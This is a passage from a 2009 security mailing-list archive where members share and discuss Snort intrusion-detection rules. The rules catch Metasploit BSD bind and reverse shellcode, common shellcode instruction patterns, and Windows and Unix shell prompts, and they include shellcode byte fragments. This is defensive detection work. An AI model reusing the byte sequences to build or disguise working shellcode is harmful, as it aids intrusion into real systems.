> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit syscall";
> content:"|b0 01 cd 80|"; classtype:shellcode-detect; sid:666903; rev:5;
> nocase;)
> 
> 
> 
> # pop ebx on call returned and two interruptions in 60 bytes.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
> within:60; classtype:shellcode-detect; sid:666904; rev:5; nocase;)
> 
> 
> # pop ecx to use in interruption and before jmp to label data loader # VMWare
> 2 server ( 8088 default port ) false positive.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
> within:512; classtype:shellcode-detect; sid:666905; rev:5; nocase;)
> 
> 
> # three push ( bsd shellcodes use very match push ) | very much false positive
> on ssh and other services. use !$SSH_PORT ( before define var ).
> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
> classtype:shellcode-detect; sid:666906; rev:5; nocase;)
> 
> 
> # xor all regs
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
> content:"|31 d2|"; distance:1; classtype:shellcode-detect; sid:666907; rev:5;
> nocase;)
> 
> 
> 
> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
> exploits use).
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of seh
> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
> sid:666908; rev:5; nocase;)
> 
> 
> # movl $0x01, %al | int 0x91
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit Solaris.";
> content:"|b0 01 cd 91|"; classtype:shellcode-detect; sid:666908; rev:5;
> nocase;)
> 
> 
> 
> #
> # WINDOWS SHELL
> #
> 
> # C:\masm32> or C:\>
> # *:\*>
> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
> # \w\:\\.*\>
> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
> 
> 
> # 12 dirs  83.453.632.512 bytes free
> # * dirs * bytes *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
> 
> # 2 Dir(s)  37.604.442.112 bytes free
> # * Dir(s) * bytes *
> # The tablet pc and other?? i dont know
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
> 
> 
> # 02/03/2009  23:51    <DIR>          masm32
> # **/**/**** **:** <DIR> *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092; rev:1;)
> 
> 
> # %systemroot%
> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73
> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1;)
> 
> 
> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
> alert tcp any any -> any any (msg:"ET Windows registry edit";
> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/";
> sid:966600094; rev:1;)
> 
> 
> 
> #
> # Unix shell
> #
> 
> # comand >&0 <--- write on std with non create pipe shellcode
> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
> 
> 
> #Unix bash user and root ($ and #).
> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
> 
> #Unix sh and pure bash ($ and #)
> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
> 
> 
> 
> 
> 
> 
> 
> 
> 
> -- 
> Alberto Garcia de Dios.
> 
> 
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jason.weir at nhrs.org  Tue Dec  1 14:25:19 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 14:25:19 -0500
Subject: [Emerging-Sigs] RBN sigs?
Message-ID: <F236CDCE34685A458D315422458642E201D307DE@pine.nhrs.org>

I'm seeing quite a few alerts on the RBN UDP rules - dest address is
always one of my internal DNS boxes src port 53 and the traffic looks
like valid responses to DNS queries.  FW logs confirm the outbound DNS
query.

No other RBN sigs are triggering.  

Can someone give me a scenario where I'm doing lookups to and receiving
responses from DNS servers on the RBN list for hosts not on the RBN?
Hope I worded that right. Just seems odd..

-Jason


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From jonkman at jonkmans.com  Tue Dec  1 14:25:41 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:25:41 -0500
Subject: [Emerging-Sigs] jennylab.rules - Shell Thread
In-Reply-To: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
Message-ID: <312CCDA0-FF4F-4AA4-9CFE-4D123FCCE1F4@jonkmans.com>

And separating questions on the shell sigs from the others:

These are pretty tough to add. If we add just pcre sigs we'll kill sensors all over the world. And the matches being looked at are very common. These will happen very frequently in normal traffic. I don't see any good ways to add these as is. Anyone have ideas?

#
# WINDOWS SHELL
#

# C:\masm32> or C:\>
# *:\*>
#alert tcp any any -> any any (msg:"ET Windows shell execution 001"; pcre:"/\w\:\x5c.*\x3c/"; sid:2010447; rev:1;)
# \w\:\\.*\>
alert tcp any any -> any any (msg:"ET Windows shell execution 001"; pcre:"/\w\:\\.*\>/"; sid:2010448; rev:1;)


# 12 dirs  83.453.632.512 bytes free
# * dirs * bytes *
alert tcp any any -> any any (msg:"ET Windows dir shell execution 001"; pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:2010449; rev:1;)

# 2 Dir(s)  37.604.442.112 bytes free
# * Dir(s) * bytes *
# The tablet pc and other?? i dont know
alert tcp any any -> any any (msg:"ET Windows dir shell execution 002"; pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:2010450; rev:1;)


# 02/03/2009  23:51    <DIR>          masm32
# **/**/**** **:** <DIR> *
alert tcp any any -> any any (msg:"ET Windows dir shell execution 003"; pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:2010451; rev:1;)


# %systemroot%
alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73 79 73 74 65 6d 72 6f 6f 74 25|"; sid:2010452; rev:1;)


# reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
alert tcp any any -> any any (msg:"ET Windows registry edit"; pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/"; sid:2010453; rev:1;)



#
# Unix shell
#

# comand >&0 <--- write on std with non create pipe shellcode
alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse shell"; pcre:"/.*>\&0/";sid:2010454; rev:1;)


#Unix bash user and root ($ and #).
#h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
alert tcp any any -> any any (msg:"ET Unix user bash shell prefix"; pcre:"/.*\@.*\:\~\W(#|$)/";sid:2010455; rev:1;)

#Unix sh and pure bash ($ and #)
# sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
alert tcp any any -> any any (msg:"ET Unix user bash shell prefix"; pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:2010456; rev:1;)



On Nov 30, 2009, at 1:27 PM, Alberto Garcia de Dios wrote:

> Hello, I share my snort rules.
> 
> Metasploit patron ( all BSD and all filter for bsd type whitout generic unix
> shellcode ), my shellcodes patron and system patron.
> 
> 75 new rules.
> 
> 
> 
> 
> 
> # Metasploit BSD shellcode detect rules by h0f - Jennylab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> # http://www.jennylab.org
> 
> 
> 
> #
> #
> #####
> # METASPLOIT SHELLCODE RULES
> #####
> #
> #
> 
> 
> #
> # BSD METASPLOIT RULES
> #
> 
> 
> #### BSD BIND SHELL #######
> # BSD Bind Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666001; rev:5;)
> 
> 
> # BSD Bind Shell - ENCODE: CountDown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e 7 e2 fa 6b
> 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; sid:666003; rev:5;) alert
> ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
> Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71 74
> 45 d3|"; classtype:shellcode-detect; sid:666004; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77 45
> 6a 69 63|"; classtype:shellcode-detect; sid:666005; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20 2a
> 2a cc a5|"; classtype:shellcode-detect; sid:666006; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
> classtype:shellcode-detect; sid:666007; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666008; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666009; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
> classtype:shellcode-detect; sid:666010; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a
> 68 58 cd|"; classtype:shellcode-detect; sid:666011; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59 6a
> 5a 58 51|"; classtype:shellcode-detect; sid:666012; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3|"; classtype:shellcode-detect; sid:666013; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
> classtype:shellcode-detect; sid:666014; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49 49
> 51 5a 56|"; classtype:shellcode-detect; sid:666015; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42 33
> 30 42 43|"; classtype:shellcode-detect; sid:666016; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54 42
> 44 51 42|"; classtype:shellcode-detect; sid:666017; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
> 41|"; classtype:shellcode-detect; sid:666018; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|"; classtype:shellcode-detect;
> sid:666019; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexFstEnvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666020; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666021; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff
> ff ff|"; classtype:shellcode-detect; sid:666022; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49 49
> 49 49 49|"; classtype:shellcode-detect; sid:666023; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
> classtype:shellcode-detect; sid:666024; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|"; classtype:shellcode-detect;
> sid:666025; rev:5;)
> #### EOF BSD BIND SHELL ######
> 
> 
> 
> 
> 
> ### BSD REVERSE SHELL #######
> #BSD Reverse Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666026; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666027; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: Countdown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2 fa
> 6b 63 5b 9d|"; classtype:shellcode-detect; sid:666028; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26 7c
> 96 7d 79 7e|"; classtype:shellcode-detect; sid:666029; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a 50
> 54 b2 df 6d|"; classtype:shellcode-detect; sid:666030; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|"; classtype:shellcode-detect;
> sid:666031; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666032; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666033; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3 50|"; classtype:shellcode-detect; sid:666034; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
> classtype:shellcode-detect; sid:666035; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02 59
> b0 5a 51 57|"; classtype:shellcode-detect; sid:666036; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e 4f
> 49 38 41 4e|"; classtype:shellcode-detect; sid:666037; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44 56
> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:666038; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
> 42 44 51 42|"; classtype:shellcode-detect; sid:666039; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexFnstenvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666040; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666041; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
> ff ff ff|"; classtype:shellcode-detect; sid:666042; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
> classtype:shellcode-detect; sid:666043; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
> classtype:shellcode-detect; sid:666044; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
> classtype:shellcode-detect; sid:666045; rev:5;)
> ##### EOF BSD Reverse Shell#####
> 
> 
> 
> 
> ##### BSD SPARC Bind Shell #########
> #BSD SPARC Bind Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03 e0
> 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666046; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff
> fb 9e 03 e0 04|"; classtype:shellcode-detect; sid:666047; rev:5;)
> 
> 
> #BSD SPARC Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20
> 10 82 10 20 68|"; classtype:shellcode-detect; sid:666048; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20
> 6a 91 d0 20 08|"; classtype:shellcode-detect; sid:666049; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20
> 1e 91 d0 20 08|"; classtype:shellcode-detect; sid:666050; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf
> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:666051; rev:5;)
> #### EOF BSD SPARC Bind Shell #########
> 
> 
> ### BSD SPARC Reverse Shell ########
> #BSD SPARC Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10
> 20 02 82 10 20 61|"; classtype:shellcode-detect; sid:666052; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01 82
> 10 20 5a|"; classtype:shellcode-detect; sid:666053; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f c0|";
> classtype:shellcode-detect; sid:666054; rev:5;)
> 
> #BSD SPARC Reverse Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666055; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff fb 9e
> 03 e0 04|"; classtype:shellcode-detect; sid:666056; rev:5;) #### EOF BSD SPARC
> Reverse Shell ####
> 
> 
> 
> 
> 
> 
> 
> #
> ### Shellcode develop patron by h0f JennyLab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> 
> 
> # Alpha payload
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
> classtype:shellcode-detect; sid:666900; rev:5; nocase;)
> 
> 
> 
> 
> # Call payload label and pop next bytes.
>  #jmp short loader
>  #label:
>  #      code here
>  #loader:
>  # call label <--- here
>  # db '/bin/bash'
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
> classtype:shellcode-detect; sid:666901; rev:5; nocase;)
> 
> 
> 
> 
> 
> # xor eax, eax | xor ebx, ebx
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
> content:"|31 c0 31 db|"; classtype:shellcode-detect; sid:666902; rev:5;
> nocase;)
> 
> 
> 
> # mov al, 0x01 | int 0x80
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit syscall";
> content:"|b0 01 cd 80|"; classtype:shellcode-detect; sid:666903; rev:5;
> nocase;)
> 
> 
> 
> # pop ebx on call returned and two interruptions in 60 bytes.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
> within:60; classtype:shellcode-detect; sid:666904; rev:5; nocase;)
> 
> 
> # pop ecx to use in interruption and before jmp to label data loader # VMWare
> 2 server ( 8088 default port ) false positive.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
> within:512; classtype:shellcode-detect; sid:666905; rev:5; nocase;)
> 
> 
> # three push ( bsd shellcodes use very match push ) | very much false positive
> on ssh and other services. use !$SSH_PORT ( before define var ).
> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
> classtype:shellcode-detect; sid:666906; rev:5; nocase;)
> 
> 
> # xor all regs
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
> content:"|31 d2|"; distance:1; classtype:shellcode-detect; sid:666907; rev:5;
> nocase;)
> 
> 
> 
> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
> exploits use).
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of seh
> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
> sid:666908; rev:5; nocase;)
> 
> 
> # movl $0x01, %al | int 0x91
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit Solaris.";
> content:"|b0 01 cd 91|"; classtype:shellcode-detect; sid:666908; rev:5;
> nocase;)
> 
> 
> 
> #
> # WINDOWS SHELL
> #
> 
> # C:\masm32> or C:\>
> # *:\*>
> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
> # \w\:\\.*\>
> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
> 
> 
> # 12 dirs  83.453.632.512 bytes free
> # * dirs * bytes *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
> 
> # 2 Dir(s)  37.604.442.112 bytes free
> # * Dir(s) * bytes *
> # The tablet pc and other?? i dont know
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
> 
> 
> # 02/03/2009  23:51    <DIR>          masm32
> # **/**/**** **:** <DIR> *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
